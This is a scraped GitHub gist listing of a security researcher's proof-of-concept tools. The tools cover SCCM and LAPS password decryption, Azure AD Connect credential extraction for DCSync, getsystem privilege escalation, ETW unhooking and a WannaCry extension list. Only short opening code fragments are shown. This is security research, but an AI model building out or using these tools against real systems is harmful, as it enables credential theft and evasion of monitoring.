Skip to content

Instantly share code, notes, and snippets.

View xpn's full-sized avatar

Adam Chester xpn

View GitHub Profile
xpn / sccmdecryptpoc.cs
Last active September 30, 2023 11:51
SCCM Account Password Decryption POC
View sccmdecryptpoc.cs
// Twitter thread: (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
internal class Program
xpn / tasks.cs
Created August 19, 2019 13:56
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
View tasks.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
xpn / clr_via_native.c
Created April 11, 2018 21:34
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
xpn / azuread_decrypt_msol_v2.ps1
Created April 11, 2020 01:34
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
View azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
} catch {
Write-Host "[!] Could not connect to localdb..."
xpn / getsystem_parent.cpp
Created November 20, 2017 00:11
View getsystem_parent.cpp
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
LUID luid;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
xpn / wannacry_file_extensions.txt
Created May 12, 2017 23:41
A list of file extensions searched and encrypted by the WannaCry ransomware
View wannacry_file_extensions.txt
View dotnet_unhook_etw.cs
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace test
class Win32
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
View DogFoodExec.cs
using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Linq;
namespace NautilusProject
internal class CombinedExec
public static IntPtr AllocMemory(int length)
xpn / dotnet_etw.c
Created March 16, 2020 19:25
A demo of how to collect information on basic .NET events from ETW.
View dotnet_etw.c
#define AssemblyDCStart_V1 155
#define MethodLoadVerbose_V1 143
#include <windows.h>
#include <stdio.h>
#include <wbemidl.h>
#include <wmistr.h>
#include <evntrace.h>
#include <Evntcons.h>
xpn / LAPSDecrypt.cs
Last active May 17, 2023 20:53
Quick POC looking at how encryption works for LAPS (v2)
View LAPSDecrypt.cs
using System;
using System.Collections.Generic;
using System.DirectoryServices.Protocols;
using System.Globalization;
using System.Linq;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Security.Policy;
using System.Security.Principal;
using System.Text;